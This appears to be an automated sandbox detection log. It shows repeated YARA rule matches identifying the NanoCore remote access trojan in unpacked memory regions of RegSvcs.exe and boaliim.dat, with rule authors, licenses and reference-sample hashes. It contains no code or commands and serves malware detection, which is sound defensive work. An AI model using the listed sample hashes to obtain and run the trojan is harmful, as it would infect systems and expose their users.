Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
